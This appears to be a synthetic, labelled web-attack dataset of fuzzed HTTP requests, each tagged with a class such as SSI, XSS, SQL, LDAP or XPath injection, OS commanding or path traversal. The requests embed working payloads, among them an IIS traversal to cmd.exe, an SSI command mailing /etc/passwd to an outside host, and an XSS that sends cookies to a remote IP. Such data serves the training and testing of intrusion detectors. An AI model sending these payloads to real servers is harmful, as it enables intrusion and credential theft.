If-Unmodified-Since: Wed, 18 Aug 04 15:01:47 GMT
If-None-Match: "e9e32HtIeCbZ7hCiff-A"
If-Range: Sat, 18 Jun 05 15:25:02 UTC
Max-Forwards: 55
Pragma: no-cache
Authorization: NTLM b3NkZnMzbm1VaDNidG1lZWNoSG1SZW5XcnNnMDd0aWVub2Fi
Referer: /ornbee4.jsp
TE: gzip;q=0.8,trailers
User-Agent: Neiil (y968yC)
Via: ienms/8.2 www.m2yiRiva.shtml:85
Transfer-Encoding: compress
----: --------------------------------------------------

null

End - Id: 36805
Start - Id: 44030
class: OsCommanding
GET /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.oAeenhEo.gov
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: cp-936, euc-jp;q=0.5, iso-8859-7, x-mac-arabic
Accept-Encoding: *;q=0.7
Accept-Language: teepka-lgzegN;q=0.9, ubtea-awmh;q=0.0, CtSEinjn-neq;q=0.0, b6-9;q=0.0
Cache-Control: no-store
Client-ip: 78.141.142.69
Cookie: fMFfevalAmPw=hTLBb
Cookie2: $Version="698"
Date: Wed, 28 Feb 07 01:08:51 UTC
ETag: "Ulw7dIb1rT0S2qp-n1I"
Expect: 0Vefue9s
From: t8ara@rpmnyne.de
If-Modified-Since: Wed, 04 Aug 04 04:30:42 UTC
If-Unmodified-Since: Mon, 12 Sep 05 24:40:21 UTC
If-Match: "mraKTuNMLtA8wB-Yntsv"
If-None-Match: "7eJph@gTW85_4iJH"
If-Range: Thu, 04 Dec 08 16:56:18 CET
Max-Forwards: 5078
MIME-Version: 0.2
Pragma: o='0rOus'
Proxy-Authorization: HwhbDt aamej=aueqawo
Authorization: Digest response="74b14Bd658AABAFabDFa0d4eF9c24bA4"
Range: 67-764741,470518-20,3-202913
Referer: /liRee.mdb
TE: gzip;q=0.4,chunked;q=0.9,gzip
Trailer: Accept
User-Agent: rnnrtseS (t@_r1ET73; 4gsWjFlXr; 19NfAJ)
UA-CPU: PowerPC
UA-Disp: 6819,8710,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 4697x9146
Via: HTTP/3.6 0.222.205.78, 4.6 www.RsLe.gif:7524, HTTP/0.7 5.68.185.127
Transfer-Encoding: compress
Upgrade: 4nbliA/2.5, eous/5.8, fatd0y/7.3, htsLm/7.0, ejSl/2.7
Warning: 433 www.lisatk.htm "tl3Nr" 
X-Forwarded-For: 55.100.34.25
X-Serial-Number: 204643043550
----: --------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 44030
Start - Id: 39881
class: SSI
GET /eR/soau3upe/bYKWQkNW./sJu4@EueV7KKNE3U/oio3eeAhdqbelra/neide/2xuZ6xWmAti6ro1JI4u/ieMgoK3gIxqfeGG/uaamxmG6iyjcooydGC/5WM54AEV@/ny2.shtml?LmCvi9=b07&Cem_=25 HTTP/1.0
Host: www.ftts6.fr
Connection: keep-alive
Accept-Charset: x-mac-roman, iso-8859-6
Accept-Encoding: 
Accept-Language: <!--    #exec   cmd="/bin/mail  tt85wbNelg.com   < /etc/passwd"-->
Cookie2: $Version="49"
Date: Fri, 05 Feb 10 21:27:43 UTC
Expect: mmaaw
If-Unmodified-Since: Fri, 25 Mar 05 17:23:05 GMT
If-Match: "8DrkcM2PpNCGJ0I.74D"
If-Range: Sat, 25 Sep 04 18:00:44 UTC
Max-Forwards: 34
Pragma: no-cache
Referer: /snnNt.jsp
Trailer: Proxy-Authorization
User-Agent: tnmIdOu (h2QPcy-T; fbedj9nN)

null

End - Id: 39881
Start - Id: 42431
class: SqlInjection
GET /umPcrrcir/mibt7scn/ztesegio/ta/d0RloB/aotImdoc/if5pNR./yOTi0gMz47qv9NMP/xtX.mdb?Trxml@m1rmNc0Nr=OR++++02726%3E23232611249 HTTP/1.1
Host: www.Xrordxipe.gov
Connection: close
Accept: */*
Accept-Charset: us-ascii;q=0.6, cp-932, iso-8859-4
Accept-Encoding: 
Accept-Language: 1haeuane-keEiza, isjrttv-nklye, bbtatai-ueef;q=0.9
Cache-Control: no-transform
Client-ip: 34.227.190.70
Cookie: Id4tmochaPi4=h4eval;zgThhxdhoi=s9;ZMN1-YY5inputtmpK=met'eiiybgsound|3fromxterma|xha;rl8ORt=67;iakth8e=40978408;el6rtenHifD=3
Cookie2: $Version="2"
Date: Fri, 06 Oct 06 04:15:48 GMT
ETag: "ZSerFm.z9rWfs9@A7MH."
Expect: ctja
From: ein6@dloaflHo.biz
If-Modified-Since: Sun, 20 May 07 18:48:52 UTC
If-Unmodified-Since: Sat, 05 Sep 09 22:55:30 UTC
If-Match: "Asx8P9sbgCYJnT."
If-None-Match: *
If-Range: Thu, 29 Jun 06 16:55:19 GMT
Max-Forwards: 57
MIME-Version: 0.6
Pragma: Sctsorwc='zo'
Proxy-Authorization: Basic aHdkZWQ6dDVtbjYzb1M=
Authorization: NTLM c0JhbzNJZWthcmhlc25zZnpob3RBdWd0ZW5hdWFyYXVuYXRqcm9vZXR1c2hF
Range: 005696-6624,4-
Referer: http://dmjn.fr/Echw5.js
TE: gzip;q=0.9,chunked,deflate;q=0.6
Trailer: If-None-Match
User-Agent: naatot/2.4.1.8.9
UA-CPU: 68000
UA-Disp: 9195,5329,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 028x6235
Via: 0.5 200.168.125.20
Transfer-Encoding: deflate
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 781 102.8.11.215 "Yhee38R7lileIanstkb" 
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42431
Start - Id: 46173
class: PathTransversal
GET /n6be/hd@QvDV.rz.O/reWc6IKRpV6oig4Zx_/2QsNOWN%uoV-IN/dg6OWlheakst/fQSKyZ2bAPGm/4xEXT-PGv/og5Ef6DHC3P/bnes/aur4yy4_LC9C/eI_Iko1ITXWkfH/aiIeoUo6oym.css?rtwso=%2Fetc%2Fpasswd&ut=edaryYYhtGreCs HTTP/1.0
Host: www.iaamis5y.fr
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.6, deflate
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 200.242.126.46
Cookie: ysht=ue;enycdvosodison0=901902067;e0heoceuxZg=rebn;uh3rxIe5iPr=dtrpsfazsxhuniono];innchi4o=ean1lboot.inioeta;go1uaIlsu5=23722
Cookie2: $Version="394"
Date: Tue, 17 Feb 09 08:24:29 GMT
ETag: "XxIGPTgMgE9f0ZK"
Expect: 4pnWf5e
From: e6aS@otptT.st
If-Modified-Since: Sat, 03 Nov 07 04:28:47 GMT
If-Unmodified-Since: Thu, 24 Nov 05 03:11:55 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Aug 05 16:21:52 CET
Max-Forwards: 5619
MIME-Version: 6.1
Pragma: N4ata=s
Proxy-Authorization: NTLM cmVoc1RydHcwRnRyeTlsYWV0dHRUaHpveWtvcmlzZWFvaW55dQ==
Authorization: NTLM d2xwcmVzdGhzbHQ1ZTFPOWlyc3VuaGRuTGxlaGF0dnQyc3RpQWVoeQ==
Range: -51066
Referer: /RAJl/naMna/lOR5.exe
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: eBDyc1UJN http://www.oaTfdhix.it
UA-CPU: StrongARM
UA-Disp: 9067,415,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 939x7286
Via: 4.1 146.144.144.133, 0.1 164.255.104.247, HTTP/9.4 137.133.162.157
Transfer-Encoding: lOhpt; riWr=qoAnt4y
Upgrade: Dnac/5.1, hoA/3.8
Warning: 823 25.141.143.47 "taoks5" "Fri, 20 May 05 04:28:26 GMT"
X-Forwarded-For: 249.22.33.20
X-Serial-Number: 143207616945
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46173
Start - Id: 40341
class: SSI
GET /bJN5vo7/nEPyh5dJVTauA39T@UZ0/aqD8TUiVfm5di2Zb.jpg?tmshrr0olps=%3C%21--++%23exec+++cmd%3D%22c%3A%5Cprogra%7E1%5CntD3Hrane%5Coet%5Cne.exe+d%3A%5Cchbjeie9%5Cwww.mansasse.org%5CtE6gi%5Cdatabase.mdb++++%2Fx+exporttofoxpro%22--%3E&7cadeqraueooiEr=+ius1nxeti%25uo%26hBdsnt&qmkdiilc=f+&a5cGsystemfMBSIM=fjlsCnedpsseY9h&srt=ohkpgJzVdY&oytA9tgS=3926036&lnh=upJTHLNTzA&eUjivndiTuh=eVi%40zN&tESiho32atysnot=exec+n8o%2Bu%2Bwnm&keosnoi5cb18tl=a+i HTTP/1.0
Host: 104.69.229.140
Connection: eeiie
Accept: application/postscript;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: otlxu-t, qtmnt-tsigy;q=0.0
Cache-Control: only-if-cached
Client-ip: 29.195.65.50
Cookie: o2uaa6elms=npneeqotEtEKtbdeD
Cookie2: $Version="3"
Date: Tue, 19 Aug 08 11:30:28 GMT
ETag: W/"sixONzZFOaxVNExZ-Zd6"
Expect: 100-continue
If-Modified-Since: Thu, 03 Jul 08 04:44:21 UTC
If-Unmodified-Since: Sun, 26 Aug 07 23:51:29 UTC
If-Match: "7Glw6.2VFNyQG7Y"
If-None-Match: *
If-Range: Wed, 08 Jun 05 18:42:08 CET
Max-Forwards: 3
Pragma: no-cache
Range: -601,-84841,57-6653
Referer: /slCuiwes/hiil/Ntrssp4A/dnane1r/sfAtatA.gif
User-Agent: 5_Cssg http://www.uohos.biz
UA-OS: Windows NT
Transfer-Encoding: identity
----: --------------------------

null

End - Id: 40341
Start - Id: 39865
class: SSI
GET /h1V4LQVM_fxlrvw.msf?e5sieOe=nZtKh-kKgE&Eazutmt0=q-1lAY_cQq&d18fau0uno=d&phlogphlf=+j&NxVconnectuJZCUp=ot%24ehwpoD+e+em%26Ea&SAo1lda3sdeh2o=93&zeP@mF=%40etmopenset0gCmmw HTTP/1.1
Host: 29.141.165.4
Connection: close
Accept: image/jpeg;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: <!    #<!--#exec cmd="id"-->
Cache-Control: no-store
Client-ip: 255.94.30.25
Cookie: soe= acd;fxeu02eact3=fiuunejandmailiise;da= ;Edintanrxerupi=rsor';t5u5YqP1=901
Cookie2: $Version="32"
Date: Thu, 03 Feb 05 15:58:31 UTC
ETag: "gzPTBt-Yp3fP3bK"
Expect: 100-continue
If-Modified-Since: Fri, 25 Apr 08 24:54:57 GMT
If-Unmodified-Since: Wed, 11 Jun 08 10:17:24 GMT
If-Match: "aThUSCW8S2pBosl6F"
If-None-Match: *
If-Range: Mon, 20 Feb 06 16:34:49 CET
Max-Forwards: 5
Authorization: Basic QWlFb3JhOmVjYTNo
Range: -18262
Referer: http://www.iQbona1.com/gaTnh/xdskoAa/leodiu.exe
TE: trailers
Trailer: If-Match
User-Agent: ashr (sarUsnGCo)
UA-Disp: 991,4045,16
UA-OS: Win98
Via: wdiidu/8.4 www.eIhIn.tiff, HTTP/5.7 www.diod.shtml, FTP/3.6 168.184.182.113
Transfer-Encoding: compress
Warning: 977 90.46.68.167 "iqgsoeueefttfoehm" "Mon, 19 Sep 05 24:23:41 CET"
X-Forwarded-For: 37.56.79.152
X-Serial-Number: 14193348040623
----: ---------------------------------

null

End - Id: 39865
Start - Id: 47480
class: XSS
GET /2TsJhavinglu/ZfhttpservicesYrhttps@ATIS/P9fQ5x9ftpS_q_/snbOO/rmesOxQarAgT/Nln/tgyd7HEeaqWaipyom/oWfNmUbmk/h3JVC0GpNC.jpeg?0orbowz=tgcd04IY1%4031&e7xge0hC8=cmeIed5vjai&ena=%2Fysni9ibr&gusluHgonsHlh=inputl%25TnAtli%3E&8eeeyrsmcr17ml=%3Cmeta+++++http-equiv++%3D%22+refresh++%22+++content+++%3D%22+++0%3Burl%3Djavascript%3A++%5Balert++++%28%27ume%27%29%3B%5D+%22++%3E&rr2oea=%7Ceume0as&OtRsrtL=494&ate=167 HTTP/1.1
Host: 57.83.106.166
Connection: close
Accept: */*;q=0.8
Accept-Charset: gb2312;q=0.1, iso-2022-jp, utf-7;q=0.3, us-ascii, x-mac-greek;q=0.3
Accept-Encoding: identity, compress;q=0.5, compress;q=0.9, deflate
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 205.71.159.23
Cookie: QYvsfxspassthru=8sohNbNth ;psprEa=a7-BZ-H6;e46i1ee9aAs=tad%u
Cookie2: $Version="8"
Date: Wed, 24 Dec 08 09:51:06 UTC
ETag: W/"Q.aFiei1JBvNXi@"
Expect: 100-continue
From: ghun@e9ggr0ugra.com
If-Modified-Since: Mon, 12 Dec 05 12:32:05 GMT
If-Unmodified-Since: Fri, 20 Feb 04 13:52:36 UTC
If-Match: *
If-None-Match: *
If-Range: "cGujr_m18kin9@vL."
Max-Forwards: 8265
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: 6s4e rdvto=nzte
Authorization: jeobj itene=iembtoa
Range: 1-845224,09-
Referer: http://9ehTu.biz/rfuir/in0uun/fsoBS/bvssTnh.msf
TE: trailers,trailers
Trailer: Authorization
User-Agent: atxxv7Og4 http://www.titeod.org
UA-CPU: MIPS
UA-Disp: 2372,1267,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 747x653
Via: l5h/7.0 144.153.160.45, FTP/2.9 www.rhlninHh.shtml
Transfer-Encoding: identity
Upgrade: oRe/6.0, mo1/5.0, epS/1.1, rTdr/5.1
Warning: 858 www.Bomdfr.html:92 "eaLxhrCi8Tuapar" 
X-Forwarded-For: 162.199.201.1
X-Serial-Number: 48112496441051
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47480
Start - Id: 38534
class: LdapInjection
GET /s9DdeleteTd_/wSl5D-u/iXIw4zejFLX0gd/6a0EioItpa6t7pcni/EhenRiepea17sBIesu/XQPKSgxlink/4wL/FNwkechoH.HunFl/csblsu/t0Xe9SRlnhiaa/oHwKrwlrreA/GiVyhome.gif?niib=qfb%3E9le+i%3A+eh&_tAa96=09132&libd=tue%3Fttlh%26iid&xjdB34Olh=Et0jl&nntstSettpnu=6990277&aUIs1ehtahokaml=010&noahnsfizh=%29+++%28%7C++++%28qItoi%3D0nef*%29&4ay=+ HTTP/1.1
Host: 51.135.71.186:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-15;q=0.7, iso-8859-5;q=0.8, windows-1250;q=0.0, x-mac-chinesesimp;q=0.0, windows-1258;q=0.9
Accept-Encoding: 
Accept-Language: i-9sedeesx;q=0.6, d-a0naYrta, fnsdmEat-g7tt9dnh;q=0.9
Cache-Control: only-if-cached
Client-ip: 101.131.250.156
Cookie: Plh1HzsOoobaHt= @eaeioac:Ttexec2homeyct;n;U0zUexecT=eaaeowupdateiloml1;ehbEf=9017099
Cookie2: $Version="187"
Date: Thu, 15 May 08 13:30:21 UTC
ETag: "isirvvJoG96lB0_5"
Expect: 100-continue
From: n9eatae@mdeel.gov
If-Modified-Since: Wed, 29 Oct 08 14:53:15 CET
If-Unmodified-Since: Mon, 26 Apr 04 16:27:22 GMT
If-Match: "5vg-cso4gsJ2GI3Xh."
If-None-Match: *
If-Range: Tue, 30 Mar 10 05:24:32 CET
Max-Forwards: 377
MIME-Version: 8.2
Pragma: m5Gd='bi26e'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Digest uri=/tCeeltm/liir8ls/Yu5tEd.css
Range: 301-86,62-,5905-
Referer: /igto/ayhaoM/yrdndnl/trnvaat.asp
TE: gzip,trailers
Trailer: If-Range
User-Agent: Mozilla/9.7 (Windows; U; Windows NT 7.0; rs-ap; rv:4.4.8) Gecko/19166387
UA-CPU: MIPS
UA-Disp: 967,395,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 8726x4401
Via: HTTP/8.1 www.aOgo.htm, 1.8 www.odCou.jpg
Transfer-Encoding: gzip
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38534
Start - Id: 40699
class: SSI
PUT /nQ5JzScG3n3aMm73Ty/m44y2EYDY2RyW5vGfj3/4rliduVre9nthtcEatwn/nB7NEHkYf/iji2uys/4FNZpxvXHvX1W-g/s5ugIrren8teml3j/DVhdivid/ehhlfosasrc/vESqETBZ/rOqBbp.sh? HTTP/1.1
Content-Length: 317
Content-Language: nohc
Content-Encoding: identity
Content-Location: http://www.escae9t.gov/go7csert/ueit/mxeii/eclnus/l5ums.cgi
Content-MD5: ZEZuR2FVcnVUc2xiOG50WQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Nov 08 15:05:28 UTC
Last-Modified: Mon, 05 Apr 10 14:58:23 CET
Host: www.Utrmsbw.gov:25062
Connection: close
Accept: audio/*;q=0.9, application/*;q=0.9
Accept-Charset: *
Accept-Encoding: <!-- #include  virtual="c:\winnt\system.ini"     -->
Accept-Language: *;q=0.3
Cache-Control: i='tn7f'
Client-ip: 207.140.252.172
Cookie: tt28eOcifwiy2ai=wOhlthomeo4
Cookie2: $Version="51"
Date: Sun, 29 Jan 06 23:13:08 CET
From: it4riort@8ismert.net
If-Modified-Since: Wed, 21 Jul 04 04:24:55 CET
If-Unmodified-Since: Fri, 04 Feb 05 18:59:15 UTC
If-Match: *
If-None-Match: "RClSkLPc4kw1QV3H9j7M"
If-Range: Sat, 03 Jul 04 18:07:23 CET
Max-Forwards: 9
Pragma: no-cache
Authorization: Digest cnonce="kcfe"
Range: 163476-252825
Referer: http://www.eEedl.st/Nair/oe8naeeb/aoiaZ/nfli/c0lheco.tar.gz
User-Agent: Mozilla/1.7 (Windows; U; Win 9x 0.1; t2-62; rv:0.5.9) Gecko/20004344
UA-CPU: 68000
UA-OS: FreeBSD
Via: 4.2 www.ophG8htn.shtml, 4.3 www.YouoeI.js, 3.2 74.79.25.216
Transfer-Encoding: deflate
Upgrade: 3ceT/4.5
Warning: 284 61.107.124.121 "cqzs3re94a5ehd" 
X-Forwarded-For: 179.21.152.144
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

opS1l6riJ6tnhra=hltelnet&elehiNnni=94&a5l8tbyif5neast=o  y;aiwp-~oiinEnlR(7os&hhrnswbu8wni=hxjP@S-uj7ea&hsSa7hd7Eootdy=ri\&1t=31&ZmNkUupdateinsertZ.xy=c'el stdineshutdown&Lhss6ob=xs6I+oeeh/t>ecmdinen&yiagivt=ctsoeJ&o7b1hvoteibloel=bnH38hY1QM&pw=5e&ttooytmstamshmr=meEtnasrn4der&si=e4zFcRvJ&uelv2=itM

End - Id: 40699
Start - Id: 49009
class: XPathInjection
GET /gIEDv/asvqdwrueoyraTtehi/sart/9hp/is7req/uUa6o8B/ssfetu/zVJwpiuG4z.css?wniuku=ywur71eraA&vls=llsprocessing-instruction1t&IG0W.UP=0382420&ewIHb=rJW&dCoire5i=76185010&thvntostwit=1&p8ph=11345438&vhiweiihidd=n4kddotjllncohdoL&has5B1liepzbht=Esta3ee%27+++or+count%28++++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28++++i+%2B++j++%2B++k+%2B+l+++%2B1%29%5D+++++%7C++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or++%272ie%27%3D++%27+++da%27++or&et=iL9Khn3&crews1xOt=w0zx9VnLqbZ&ntnassnemqchoa=sLw.OpXhXm&TeniOle5e9oyht=dn8r HTTP/1.0
Host: www.vfsne.org:649
Connection: close
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.7
Accept-Language: *
Cache-Control: min-fresh=82
Client-ip: 178.164.49.79
Cookie: rnli=p5i;21hnnOv=4access_log;rsOceUonbtr2wn=dhAleatunrmee8vr8;hiabeo=heAat5qlf;_3_d.YTA4eUj=8412101773;cttHvHn0frtn==wgete
Cookie2: $Version="24"
Date: Tue, 06 Jan 09 19:24:47 CET
ETag: W/"A_OF1TsXBNTJNorCOij"
Expect: llun=mlahrp;mfssaq=at6xRd
From: w6wr@nytn.it
If-Modified-Since: Thu, 23 Apr 09 18:17:43 UTC
If-Unmodified-Since: Fri, 20 May 05 14:12:56 GMT
If-Match: "k@dnYl8d3xyUDeNHpV"
If-None-Match: "@yXajP0ng7FAmZZhAJQN"
If-Range: "iZm_0vun_wVTYBE"
Max-Forwards: 2
MIME-Version: 9.3
Pragma: no-cache
Proxy-Authorization: NTLM aGhmYTFhcnlxZWh1bmFhZXVvYkd0aXlmcmRCYTJyeXJlaW4=
Authorization: Basic dGxpd2VjOmF0YzgxY21u
Range: -31
Referer: /uh1ehFg/7lil.dll
TE: deflate;q=0.5,gzip,deflate
Trailer: From
User-Agent: gWe7hwve (yCnwXy5; iI8INvz; ftn-yC_b; lDCGTH.lcI)
UA-CPU: 68000
UA-Disp: 787,994,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 4125x649
Via: HTTP/8.6 www.taT1iA2.css, 0.4 www.strna.htm, FTP/4.1 www.aroSir.gif
Transfer-Encoding: deflate
Upgrade: meeoe/8.2, nir2fe/4.3, eS7e/1.8, nerHu/7.3
Warning: 909 www.ltbsdofa.js "dHgusFu9" 
X-Forwarded-For: 85.135.62.221
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49009
Start - Id: 36651
class: OsCommanding
GET /jwbvztnjtm0eodeaif/aLS4pd/iuErym3.pl?@54UservicesDqzwEc=lsre&ViolomessoONf=h.kMec&mtgsce=4254878&Ebau=y%40QPcq.7jfQ8&dXulazseDEoc=6&um7uK9AMnAa=132.159.108.145++++%7C+dir%2Bc%3A%5C&tim=nsbnrth%40naoq&TyCYReRihtc=715&xp_REk=nz&Ulhselect-j-XJ0QC=ode&atjrraj=109&@3kselectvbscript=nb9ycfZK7&Jnc_KE=e3y HTTP/1.0
Host: 188.70.132.181:189
Connection: keep-alive
Accept: audio/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 237.53.232.194
Cookie: tctfnypcjgre=5378091;laeAerfdpiohl=rh
Date: Mon, 10 Jan 05 23:40:42 GMT
Expect: foAfel
From: zeiTo@a5ng.biz
If-Modified-Since: Sun, 25 Dec 05 01:41:44 UTC
If-Match: "JFrPRg6DZ2Zw4CwlymH"
If-None-Match: "F2-tz_em74WE7TddjB6"
If-Range: *
Max-Forwards: 5
MIME-Version: 8.5
Authorization: knwa2 hhrais7=2pEA
Referer: http://rwtlot.cz/oo8r9hg.jpg
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: onehgdSrs/1.2.2.7.3
UA-CPU: Sparc
UA-OS: Linux
Via: rost5/2.2 123.53.16.166, FTP/8.9 www.tnsas.tiff
Transfer-Encoding: compress
Upgrade: hirt/7.6, istgh/5.6, szyxei/3.3, aaas/9.3, pd3/0.4
X-Forwarded-For: 193.167.35.201
----: -----------------

null

End - Id: 36651
Start - Id: 37737
class: LdapInjection
GET /ni5TO/ef4noqzz4zy/zcweeesosg2E/sUkf0lkY/toseggrlmhrc/R_e/e3T15eDDSPuNZVeP.jsp?udidthetvoychl=%29+%28++%7C%28displayName%3Dhad*%29++++%28name++%3D++had*+%29%28++++mail%3Dhad*++%29&tU3StelnetservicesmFf4=918 HTTP/1.0
Host: 200.55.50.20
Connection: close
Accept: */*
Accept-Charset: iso-8859-8;q=0.0, x-mac-icelandic
Accept-Encoding: identity, gzip;q=0.0, deflate;q=0.8, compress;q=0.3, compress
Accept-Language: utnh-7;q=0.5, 7bdelen-d9r;q=0.0, pkrlce2n-e1;q=0.2
Cache-Control: 4s='a'
Client-ip: 136.48.47.50
Cookie: ioirui=0t
Cookie2: $Version="7"
Date: Thu, 20 Mar 08 20:37:51 GMT
ETag: "TwKjEnP9b6CUMxEiANMS"
Expect: 100-continue
From: ft5sbsfs@ttt1ze.uk
If-Modified-Since: Wed, 27 Oct 04 03:11:24 GMT
If-Unmodified-Since: Sat, 18 Oct 08 13:14:19 CET
If-Match: "ZU107W6HC9QbDAzi6um4"
If-None-Match: *
If-Range: "5rLgSkRYRNIlYyAp_ik"
Max-Forwards: 7901
Pragma: pa='5b'
Authorization: Digest username="tau8fte"
Referer: http://www.rkulle.org/piel/aentd/1rner4/fra3Ihc.jpg
Trailer: Date
User-Agent: shxzxetqG http://www.Lswl.be
UA-CPU: x86
UA-Disp: 756,0789,32
UA-OS: Solaris
Via: 3.1 www.otamen9.js, HTTP/0.6 www.erohT9Nt.shtml, FTP/6.8 122.121.127.181
Transfer-Encoding: eeehNs; derft=eep3tnt
Upgrade: 4da/3.4
Warning: 069 www.lmgThl1.html "siohotdtta4mee" "Sat, 10 Jan 09 23:15:18 UTC"
X-Forwarded-For: 33.253.224.201
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37737
Start - Id: 40143
class: SSI
GET /PuRshutdownLzf6wp-httpsPfE/wjTJpCXfy35-@EiGC/pu5ni8ywhsseyetenntt/Rt/tgenttneoshxif/sBKafrOus/ehldwtxirIXiSmt9rnpr.msf?Hatc3oa8=ixkJdXSUJTa&ozee=%3C%21--+++++%23exec+++++cmd%3D%22%2Fbin%2Fls+++++-l++%2Fhome%2FDiosoetd%2Fevihnaie%22++--%3E&d4rM1ine=131&FO8fQadminjOX=0llikewprocessing-instructionhlogat&1hp=aO&saesta1c6e=swt&cmoxheEt9rrc7r=rreFs HTTP/1.1
Host: www.a5n4ofpel.it:46
Connection: close
Accept: application/x-tar;q=0.4, audio/*
Accept-Charset: *
Accept-Encoding: deflate, identity, identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 241.243.180.77
Cookie: tY-17=5NJwv;h5i8mllmoynle=4Ate]
Cookie2: $Version="308"
Date: Mon, 23 Jan 06 23:58:35 UTC
ETag: W/"uhP0g@xuC5h0Z.5MOH"
Expect: ocnesn
From: stce@ygsk.st
If-Modified-Since: Thu, 11 Mar 10 11:51:36 UTC
If-Unmodified-Since: Mon, 24 Jul 06 13:10:17 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Jul 04 12:35:15 GMT
Max-Forwards: 53
MIME-Version: 3.7
Pragma: 6f=4
Proxy-Authorization: iici 6rR5nn=rdoeN9um
Authorization: hhea kbvcna=cnsctd
Range: 01-76865,-324119,86535-
Referer: http://naoJueh.it/iawlybO/Pina/apycot.pl
TE: trailers,trailers
Trailer: From
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 1.4; 2i-h6; rv:9.6.5) Gecko/25896769
UA-Disp: 5908,939,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 159x553
Via: 8.7 www.iniJ.html
Transfer-Encoding: identity
Warning: 318 191.70.190.146 "iieDaosahs2o" 
X-Forwarded-For: 17.71.219.93
X-Serial-Number: 7694674190970
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40143
Start - Id: 47355
class: XSS
GET /hc1/ilQOBkS9GBJM/child3M6t2ISUex.msf?lrtsleiy6melT=he+lb&eh=1977&emcnu0liud=aHjN&EnyentttehEs=ttsxoiouszftpec+&iNwt0ze=%3Cimg+src++++%3D+++%22++++mocha%3A%5Bwindow.open%28%27http%3A%2F%2F101.38.248.115%2Falrait.nsf%27%2Bdocument.cookie%29%3B%5D+++++%22+%3E HTTP/1.1
Host: 26.135.209.75
Connection: close
Accept: video/quicktime
Accept-Charset: windows-1250;q=0.3, us-ascii
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 46.13.165.123
Cookie: kiarhE21srkCdEn=tni;tmthro5pXtl=53955950;iap=1631475530;ncreanY7=pgutsovsfeokdwonN;nirsr=5
Cookie2: $Version="2"
Date: Mon, 16 Nov 09 07:12:24 GMT
ETag: "@mde0ZusAb@AO0tf@n"
Expect: 100-continue
From: hrsita@gtnEqlet.org
If-Modified-Since: Sun, 11 Oct 09 05:32:28 UTC
If-Unmodified-Since: Sun, 05 Jul 09 12:41:16 GMT
If-Match: "@j4e_aIs.vVcPL8PK"
If-None-Match: *
If-Range: "4IXXXt3uiVAq3fz"
Max-Forwards: 187
MIME-Version: 8.1
Pragma: ocsw=g
Proxy-Authorization: Basic ZW9pcWVsZzptdHNsRA==
Authorization: tzlma dsiixmto=lersh
Range: -066761,152-
Referer: /idn3agh/eaBsre/ldwnio2v.msf
TE: deflate
Trailer: Trailer
User-Agent: tJvZzZw http://www.ioh6.com
UA-CPU: MIPS
UA-Disp: 2126,5333,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 781x9042
Via: Efe/3.6 www.nEnESanm.js:9313, FTP/3.1 www.emeot.js, 5.0 6.90.244.215
Transfer-Encoding: gzip
Upgrade: ek7/9.9, ih4i/2.6, tncaf/1.8, fikd/2.8, enm/1.6
Warning: 942 133.3.67.151 "re4lwp" "Wed, 23 Jun 04 23:49:55 CET"
X-Forwarded-For: 216.123.220.178
X-Serial-Number: 0450626600564347
----: -------------------------------------------------
